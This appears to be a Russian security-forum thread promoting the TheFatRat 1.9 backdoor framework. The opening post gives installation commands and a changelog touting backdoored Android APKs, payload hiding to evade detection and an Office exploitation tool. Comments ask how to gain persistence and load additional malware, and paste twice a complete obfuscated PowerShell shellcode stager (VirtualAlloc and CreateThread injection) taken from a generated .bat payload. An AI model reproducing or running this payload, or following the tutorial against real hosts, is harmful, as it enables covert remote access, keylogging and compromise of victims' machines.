• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Soft The Fat Rat - Backdoor для удаленного доступа V.1.9

Приветствую! Думаю многие из вас слышали об инструменте предназначенном для получения удаленного доступа к целевому хосту под названием The Fat Rat.
В этой статье речь пойдет об обновлении его до версии 1.9.

upload_2017-6-7_23-9-18.png


Приступим к установке, я использую обновленный дистрибутив Kali Linux 2017.1.

> git clone https://github.com/Screetsec/TheFatRat

upload_2017-6-7_23-9-32.png


> cd TheFatRat/

> bash setup.sh

upload_2017-6-7_23-9-49.png


Дожидаемся окончания установки и запускаем TheFatRat из консоли командой:

> fatrat


upload_2017-6-7_23-10-15.png


После проверки необходимых зависимостей, смотрим и внимаем на следующее сообщение:

upload_2017-6-7_23-10-34.png


С этим, я думаю, все понятно, идем дальше жмакнув Enter:

upload_2017-6-7_23-10-46.png


Тут, нас встречает главное меню фреймворка.

Список изменений в новой версии:

· V1.9.4 - Fatrat будет иметь полноценный терминальный режим, добавлен инструмент Powerstage, скрипт установки перестроен.

· V1.9.3 - Добавлен скрипт обновления CHANGELOG.

· V1.9.3 - Dex2Jar будет теперь установлен после установки Fatrat вручную в пользовательской системе (Kali по-прежнему использует старую версию)

· V1.9.3 - Обновлены инструменты для создания Android для V.26 RC1 и платформы Android V. 25-R03.

· V1.9.3 - Обновлен dana travis backdoor-apk до 0.2.2 в fatrat / добавлен openssl в настройке.

· V1.9.2 - Msfvenom Android Rat будет подписан Android - сертификатом, поэтому он может быть установлен правильно.

· V1.9.2 - Реализован по умолчанию LHOST & LPORT config для fatrat & powerfull shell creator.

· V1.9.2 - Реализованные функции Stop в pnwinds.

· V1.9.2 - Новый процесс подписания в старом методе backdoor apk & option для создания listener’a.

· V1.9.2 - Реализована возможность для пользователя сохранять msfconsole listener’s.

· V1.9.2 - Исправления в Microsploit.

· V1.9.2 - Реализован локальный IP-адрес, открытый IP-адрес и имя для powerl.sh

· V1.9.2 - Реализован локальный IP-адрес, открытый IP-адрес и имя хоста перед установкой пользователя LHOST.

· V1.9.2 - Реализовано создание журнала для Microsploit и исправленных ошибок

· V1.9.2 - Добавлен эффективный способ обнаружения пользовательского дистрибутива Linux.

· V1.9.2 - Setup.sh (исправлено).

· V1.9.2 - Удалены некоторые функции и переменные.

· V1.9.1 - v1.9.1 - Реализован Microsploit (Office Exploitation Tool).

· V1.9b - реализован Backdoor-apk от Dana James Traversie в этой версии. {Меньше инструментов для установки во время setup.sh}.

· V1.9.0 - Обновлен скрипт setup.sh.

· V1.9.0 - Исправлены опечатки и ошибки.

· V1.9.0 - Backdoor APKS имеет новый метод скрытия полезной нагрузки в apk Rat, чтобы не быть обнаруженным.

· V1.9.0 - APK (5) rebuild Rat полностью изменилось (адаптированный скрипт backdoor-apk для fatrat).

· V1.9.0 - Apktool больше устанавливается с помощью setup.sh, то же самое относится к: dx, zipalign (apktool на debian repo - 2.2.1, и эта версия дает ошибку при компиляции apk-файлов, поэтому обновлены инструменты apktool и android).

· V1.9.2 - Исправлена полезная нагрузка в опции pnwinds2.

На этом, пожалуй, все. Напоследок, хочу сказать, что он (TheFatRat) стал гораздо круче, жду Ваши статьи с примерами применения этого фреймворка.

Спасибо за внимание.

upload_2017-6-7_23-11-15.png
 
Последнее редактирование:
O

Oksy

Да практически все то же самое, что и в первой статье. ifconfig теперь не надо клацать.
Было бы здорово увидеть дальнейшее использование нагрузки метерпретера. Как закрепиться в системе, как поставить файл в автозагрузку. Подгрузка дополнительных вирусняков, и тп.

Вообще начиная знакомство с FatRat я надеялась получить радмина, похожего на тимвивер. Здесь все немножко по другому, но тоже сойдет :).

У меня был баг, но это скорее всего к метерпретеру и MSF вопросы. Файл отчетов кейлогера не создавался, хотя в консоли было указано его название и мето где он лежит. Но такой папки даже небыло:confused:

И еще вопрос, что это за кракозябры в .bat файле, и на каком это языке написано. А то хотелось бы научиться понимать содержимое, и писать самостоятельно подобные письмена.
powershell -w 1 -C "sv D -;sv u ec;sv dX ((gv D).value.toString()+(gv u).value.toString());powershell (gv dX).value.toString() 'JABtAHEAdABnACAAPQAgACcAJABVAHoAagBqACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFUAegBqAGoAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBkACwAMAB4AGEANwAsADAAeABkAGEALAAwAHgANgA0ACwAMAB4ADMANwAsADAAeABkAGIALAAwAHgAYwBlACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA2ADgALAAwAHgAMQAzACwAMAB4ADAAMwAsADAAeAA2ADgALAAwAHgAMQAzACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgANQBiACwAMAB4ADMAOAAsADAAeAA5ADEALAAwAHgAYwBiACwAMAB4ADQAYgAsADAAeAAzAGYALAAwAHgANQBhACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMgAwACwAMAB4AGQAMgAsADAAeABkADEALAAwAHgAYgBhACwAMAB4ADYAMAAsADAAeAA4ADAALAAwAHgAOQAyACwAMAB4AGUAYwAsADAAeAA1ADAALAAwAHgAYwAyACwAMAB4AGYANwAsADAAeAAwADAALAAwAHgAMQBhACwAMAB4ADgANgAsADAAeABlADMALAAwAHgAOQAzACwAMAB4ADYAZQAsADAAeAAwAGYALAAwAHgAMAAzACwAMAB4ADEANAAsADAAeABjADQALAAwAHgANgA5ACwAMAB4ADIAYQAsADAAeABhADUALAAwAHgANwA1ACwAMAB4ADQAOQAsADAAeAAyAGQALAAwAHgAMgA1ACwAMAB4ADgANAAsADAAeAA5AGUALAAwAHgAOABkACwAMAB4ADEANAAsADAAeAA0ADcALAAwAHgAZAAzACwAMAB4AGMAYwAsADAAeAA1ADEALAAwAHgAYgBhACwAMAB4ADEAZQAsADAAeAA5AGMALAAwAHgAMABhACwAMAB4AGIAMAAsADAAeAA4AGQALAAwAHgAMwAxACwAMAB4ADMAZgAsADAAeAA4AGMALAAwAHgAMABkACwAMAB4AGIAOQAsADAAeAA3ADMALAAwAHgAMAAwACwAMAB4ADEANgAsADAAeAA1AGUALAAwAHgAYwAzACwAMAB4ADIAMwAsADAAeAAzADcALAAwAHgAZgAxACwAMAB4ADUAOAAsADAAeAA3AGEALAAwAHgAOQA3ACwAMAB4AGYAMwAsADAAeAA4AGQALAAwAHgAZgA2ACwAMAB4ADkAZQAsADAAeABlAGIALAAwAHgAZAAyACwAMAB4ADMAMwAsADAAeAA2ADgALAAwAHgAOAA3ACwAMAB4ADIAMAAsADAAeABjAGYALAAwAHgANgBiACwAMAB4ADQAMQAsADAAeAA3ADkALAAwAHgAMwAwACwAMAB4AGMANwAsADAAeABhAGMALAAwAHgAYgA2ACwAMAB4AGMAMwAsADAAeAAxADkALAAwAHgAZQA4ACwAMAB4ADcAMAAsADAAeAAzAGMALAAwAHgANgBjACwAMAB4ADAAMAAsADAAeAA4ADMALAAwAHgAYwAxACwAMAB4ADcANwAsADAAeABkADcALAAwAHgAZgBlACwAMAB4ADEAZAAsADAAeABmAGQALAAwAHgAYwBjACwAMAB4ADUAOAAsADAAeABkADUALAAwAHgAYQA1ACwAMAB4ADIAOAAsADAAeAA1ADkALAAwAHgAMwBhACwAMAB4ADMAMwAsADAAeABiAGEALAAwAHgANQA1ACwAMAB4AGYANwAsADAAeAAzADcALAAwAHgAZQA0ACwAMAB4ADcAOQAsADAAeAAwADYALAAwAHgAOQBiACwAMAB4ADkAZQAsADAAeAA4ADUALAAwAHgAOAAzACwAMAB4ADEAYQAsADAAeAA3ADEALAAwAHgAMABjACwAMAB4AGQANwAsADAAeAAzADgALAAwAHgANQA1ACwAMAB4ADUANQAsADAAeAA4ADMALAAwAHgAMgAxACwAMAB4AGMAYwAsADAAeAAzADMALAAwAHgANgAyACwAMAB4ADUAZAAsADAAeAAwAGUALAAwAHgAOQBjACwAMAB4AGQAYgAsADAAeABmAGIALAAwAHgANAA0ACwAMAB4ADMAMAAsADAAeAAwAGYALAAwAHgANwA2ACwAMAB4ADAANwAsADAAeAA1AGMALAAwAHgAZgBjACwAMAB4AGIAYgAsADAAeABiADgALAAwAHgAOQBjACwAMAB4ADYAYQAsADAAeABjAGIALAAwAHgAYwBiACwAMAB4AGEAZQAsADAAeAAzADUALAAwAHgANgA3ACwAMAB4ADQANAAsADAAeAA4ADIALAAwAHgAYgBlACwAMAB4AGEAMQAsADAAeAA5ADMALAAwAHgAZQA1ACwAMAB4ADkANAAsADAAeAAxADYALAAwAHgAMABiACwAMAB4ADEAOAAsADAAeAAxADcALAAwAHgANgA3ACwAMAB4ADAANQAsADAAeABkAGUALAAwAHgANAAzACwAMAB4ADMANwAsADAAeAAzAGQALAAwAHgAZgA3ACwAMAB4AGUAYgAsADAAeABkAGMALAAwAHgAYgBkACwAMAB4AGYAOAAsADAAeAAzADkALAAwAHgANAA4ACwAMAB4AGIAYgAsADAAeAA2AGUALAAwAHgAMAAyACwAMAB4ADIANQAsADAAeABjADMALAAwAHgAMAA3ACwAMAB4AGUAYQAsADAAeAAzADQALAAwAHgAYwA0ACwAMAB4AGMANgAsADAAeABiADYALAAwAHgAYgAxACwAMAB4ADIAMgAsADAAeABiADgALAAwAHgAMQA2ACwAMAB4ADkAMgAsADAAeABmAGEALAAwAHgANwA4ACwAMAB4AGMANwAsADAAeAA1ADIALAAwAHgAYQBiACwAMAB4ADEAMAAsADAAeAAwAGQALAAwAHgANQBkACwAMAB4ADkANAAsADAAeAAwADAALAAwAHgAMgBlACwAMAB4AGIANwAsADAAeABiAGQALAAwAHgAYQBhACwAMAB4AGMAMQAsADAAeAA2AGUALAAwAHgAOQA1ACwAMAB4ADQAMgAsADAAeAA3AGIALAAwAHgAMgBiACwAMAB4ADYAZAAsADAAeABmADMALAAwAHgAOAA0ACwAMAB4AGUAMQAsADAAeAAwAGIALAAwAHgAMwAzACwAMAB4ADAAZQAsADAAeAAwADYALAAwAHgAZQBiACwAMAB4AGYAZAAsADAAeABlADcALAAwAHgANgAzACwAMAB4AGYAZgAsADAAeAA2ADkALAAwAHgAMAA4ACwAMAB4ADMAZQAsADAAeAA1AGQALAAwAHgAMwBmACwAMAB4ADEANwAsADAAeAA5ADQALAAwAHgAYwA4ACwAMAB4AGIAZgAsADAAeAA4AGQALAAwAHgAMQAzACwAMAB4ADUAYgAsADAAeABlADgALAAwAHgAMwA5ACwAMAB4ADEAZQAsADAAeABiAGEALAAwAHgAZABlACwAMAB4AGUANQAsADAAeABlADEALAAwAHgAZQA5ACwAMAB4ADUANQAsADAAeAAyAGYALAAwAHgANwA0ACwAMAB4ADUAMgAsADAAeAAwADEALAAwAHgANQAwACwAMAB4ADkAOAAsADAAeAA1ADIALAAwAHgAZAAxACwAMAB4ADAANgAsADAAeABmADIALAAwAHgANQAyACwAMAB4AGIAOQAsADAAeABmAGUALAAwAHgAYQA2ACwAMAB4ADAAMAAsADAAeABkAGMALAAwAHgAMAAwACwAMAB4ADcAMwAsADAAeAAzADUALAAwAHgANABkACwAMAB4ADkANQAsADAAeAA3AGMALAAwAHgANgBjACwAMAB4ADIAMgAsADAAeAAzAGUALAAwAHgAMQA1ACwAMAB4ADkAMgAsADAAeAAxAGQALAAwAHgAMAA4ACwAMAB4AGIAYQAsADAAeAA2AGQALAAwAHgANAA4ACwAMAB4ADgAOAAsADAAeAA4ADYALAAwAHgAYgBiACwAMAB4AGIANAAsADAAeABmAGUALAAwAHgAZQA2ACwAMAB4ADcAZgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAbAB2AEcAagA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAbAB2AEcAagAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAbAB2AEcAagAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAG0AcQB0AGcAKQApADsAJABYAFIARwAgAD0AIAAiAC0AZQBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABoAGgAagBmACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGgAaABqAGYAIAAkAFgAUgBHACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFgAUgBHACAAJABlACIAOwB9AA=='"
 
  • Нравится
Реакции: said и citizen2517

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 186
BIT
0
Да практически все то же самое, что и в первой статье. ifconfig теперь не надо клацать.
Было бы здорово увидеть дальнейшее использование нагрузки метерпретера. Как закрепиться в системе, как поставить файл в автозагрузку. Подгрузка дополнительных вирусняков, и тп.

Вообще начиная знакомство с FatRat я надеялась получить радмина, похожего на тимвивер. Здесь все немножко по другому, но тоже сойдет :).

У меня был баг, но это скорее всего к метерпретеру и MSF вопросы. Файл отчетов кейлогера не создавался, хотя в консоли было указано его название и мето где он лежит. Но такой папки даже небыло:confused:
[doublepost=1496914572,1496914071][/doublepost]И еще вопрос, что это за кракозябры в .bat файле, и на каком это языке написано. А то хотелось бы научиться понимать содержимое, и писать самостоятельно подобные письмена.
powershell -w 1 -C "sv D -;sv u ec;sv dX ((gv D).value.toString()+(gv u).value.toString());powershell (gv dX).value.toString() 'JABtAHEAdABnACAAPQAgACcAJABVAHoAagBqACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFUAegBqAGoAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBkACwAMAB4AGEANwAsADAAeABkAGEALAAwAHgANgA0ACwAMAB4ADMANwAsADAAeABkAGIALAAwAHgAYwBlACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA2ADgALAAwAHgAMQAzACwAMAB4ADAAMwAsADAAeAA2ADgALAAwAHgAMQAzACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgANQBiACwAMAB4ADMAOAAsADAAeAA5ADEALAAwAHgAYwBiACwAMAB4ADQAYgAsADAAeAAzAGYALAAwAHgANQBhACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMgAwACwAMAB4AGQAMgAsADAAeABkADEALAAwAHgAYgBhACwAMAB4ADYAMAAsADAAeAA4ADAALAAwAHgAOQAyACwAMAB4AGUAYwAsADAAeAA1ADAALAAwAHgAYwAyACwAMAB4AGYANwAsADAAeAAwADAALAAwAHgAMQBhACwAMAB4ADgANgAsADAAeABlADMALAAwAHgAOQAzACwAMAB4ADYAZQAsADAAeAAwAGYALAAwAHgAMAAzACwAMAB4ADEANAAsADAAeABjADQALAAwAHgANgA5ACwAMAB4ADIAYQAsADAAeABhADUALAAwAHgANwA1ACwAMAB4ADQAOQAsADAAeAAyAGQALAAwAHgAMgA1ACwAMAB4ADgANAAsADAAeAA5AGUALAAwAHgAOABkACwAMAB4ADEANAAsADAAeAA0ADcALAAwAHgAZAAzACwAMAB4AGMAYwAsADAAeAA1ADEALAAwAHgAYgBhACwAMAB4ADEAZQAsADAAeAA5AGMALAAwAHgAMABhACwAMAB4AGIAMAAsADAAeAA4AGQALAAwAHgAMwAxACwAMAB4ADMAZgAsADAAeAA4AGMALAAwAHgAMABkACwAMAB4AGIAOQAsADAAeAA3ADMALAAwAHgAMAAwACwAMAB4ADEANgAsADAAeAA1AGUALAAwAHgAYwAzACwAMAB4ADIAMwAsADAAeAAzADcALAAwAHgAZgAxACwAMAB4ADUAOAAsADAAeAA3AGEALAAwAHgAOQA3ACwAMAB4AGYAMwAsADAAeAA4AGQALAAwAHgAZgA2ACwAMAB4ADkAZQAsADAAeABlAGIALAAwAHgAZAAyACwAMAB4ADMAMwAsADAAeAA2ADgALAAwAHgAOAA3ACwAMAB4ADIAMAAsADAAeABjAGYALAAwAHgANgBiACwAMAB4ADQAMQAsADAAeAA3ADkALAAwAHgAMwAwACwAMAB4AGMANwAsADAAeABhAGMALAAwAHgAYgA2ACwAMAB4AGMAMwAsADAAeAAxADkALAAwAHgAZQA4ACwAMAB4ADcAMAAsADAAeAAzAGMALAAwAHgANgBjACwAMAB4ADAAMAAsADAAeAA4ADMALAAwAHgAYwAxACwAMAB4ADcANwAsADAAeABkADcALAAwAHgAZgBlACwAMAB4ADEAZAAsADAAeABmAGQALAAwAHgAYwBjACwAMAB4ADUAOAAsADAAeABkADUALAAwAHgAYQA1ACwAMAB4ADIAOAAsADAAeAA1ADkALAAwAHgAMwBhACwAMAB4ADMAMwAsADAAeABiAGEALAAwAHgANQA1ACwAMAB4AGYANwAsADAAeAAzADcALAAwAHgAZQA0ACwAMAB4ADcAOQAsADAAeAAwADYALAAwAHgAOQBiACwAMAB4ADkAZQAsADAAeAA4ADUALAAwAHgAOAAzACwAMAB4ADEAYQAsADAAeAA3ADEALAAwAHgAMABjACwAMAB4AGQANwAsADAAeAAzADgALAAwAHgANQA1ACwAMAB4ADUANQAsADAAeAA4ADMALAAwAHgAMgAxACwAMAB4AGMAYwAsADAAeAAzADMALAAwAHgANgAyACwAMAB4ADUAZAAsADAAeAAwAGUALAAwAHgAOQBjACwAMAB4AGQAYgAsADAAeABmAGIALAAwAHgANAA0ACwAMAB4ADMAMAAsADAAeAAwAGYALAAwAHgANwA2ACwAMAB4ADAANwAsADAAeAA1AGMALAAwAHgAZgBjACwAMAB4AGIAYgAsADAAeABiADgALAAwAHgAOQBjACwAMAB4ADYAYQAsADAAeABjAGIALAAwAHgAYwBiACwAMAB4AGEAZQAsADAAeAAzADUALAAwAHgANgA3ACwAMAB4ADQANAAsADAAeAA4ADIALAAwAHgAYgBlACwAMAB4AGEAMQAsADAAeAA5ADMALAAwAHgAZQA1ACwAMAB4ADkANAAsADAAeAAxADYALAAwAHgAMABiACwAMAB4ADEAOAAsADAAeAAxADcALAAwAHgANgA3ACwAMAB4ADAANQAsADAAeABkAGUALAAwAHgANAAzACwAMAB4ADMANwAsADAAeAAzAGQALAAwAHgAZgA3ACwAMAB4AGUAYgAsADAAeABkAGMALAAwAHgAYgBkACwAMAB4AGYAOAAsADAAeAAzADkALAAwAHgANAA4ACwAMAB4AGIAYgAsADAAeAA2AGUALAAwAHgAMAAyACwAMAB4ADIANQAsADAAeABjADMALAAwAHgAMAA3ACwAMAB4AGUAYQAsADAAeAAzADQALAAwAHgAYwA0ACwAMAB4AGMANgAsADAAeABiADYALAAwAHgAYgAxACwAMAB4ADIAMgAsADAAeABiADgALAAwAHgAMQA2ACwAMAB4ADkAMgAsADAAeABmAGEALAAwAHgANwA4ACwAMAB4AGMANwAsADAAeAA1ADIALAAwAHgAYQBiACwAMAB4ADEAMAAsADAAeAAwAGQALAAwAHgANQBkACwAMAB4ADkANAAsADAAeAAwADAALAAwAHgAMgBlACwAMAB4AGIANwAsADAAeABiAGQALAAwAHgAYQBhACwAMAB4AGMAMQAsADAAeAA2AGUALAAwAHgAOQA1ACwAMAB4ADQAMgAsADAAeAA3AGIALAAwAHgAMgBiACwAMAB4ADYAZAAsADAAeABmADMALAAwAHgAOAA0ACwAMAB4AGUAMQAsADAAeAAwAGIALAAwAHgAMwAzACwAMAB4ADAAZQAsADAAeAAwADYALAAwAHgAZQBiACwAMAB4AGYAZAAsADAAeABlADcALAAwAHgANgAzACwAMAB4AGYAZgAsADAAeAA2ADkALAAwAHgAMAA4ACwAMAB4ADMAZQAsADAAeAA1AGQALAAwAHgAMwBmACwAMAB4ADEANwAsADAAeAA5ADQALAAwAHgAYwA4ACwAMAB4AGIAZgAsADAAeAA4AGQALAAwAHgAMQAzACwAMAB4ADUAYgAsADAAeABlADgALAAwAHgAMwA5ACwAMAB4ADEAZQAsADAAeABiAGEALAAwAHgAZABlACwAMAB4AGUANQAsADAAeABlADEALAAwAHgAZQA5ACwAMAB4ADUANQAsADAAeAAyAGYALAAwAHgANwA0ACwAMAB4ADUAMgAsADAAeAAwADEALAAwAHgANQAwACwAMAB4ADkAOAAsADAAeAA1ADIALAAwAHgAZAAxACwAMAB4ADAANgAsADAAeABmADIALAAwAHgANQAyACwAMAB4AGIAOQAsADAAeABmAGUALAAwAHgAYQA2ACwAMAB4ADAAMAAsADAAeABkAGMALAAwAHgAMAAwACwAMAB4ADcAMwAsADAAeAAzADUALAAwAHgANABkACwAMAB4ADkANQAsADAAeAA3AGMALAAwAHgANgBjACwAMAB4ADIAMgAsADAAeAAzAGUALAAwAHgAMQA1ACwAMAB4ADkAMgAsADAAeAAxAGQALAAwAHgAMAA4ACwAMAB4AGIAYQAsADAAeAA2AGQALAAwAHgANAA4ACwAMAB4ADgAOAAsADAAeAA4ADYALAAwAHgAYgBiACwAMAB4AGIANAAsADAAeABmAGUALAAwAHgAZQA2ACwAMAB4ADcAZgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAbAB2AEcAagA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAbAB2AEcAagAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAbAB2AEcAagAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAG0AcQB0AGcAKQApADsAJABYAFIARwAgAD0AIAAiAC0AZQBjACAAIgA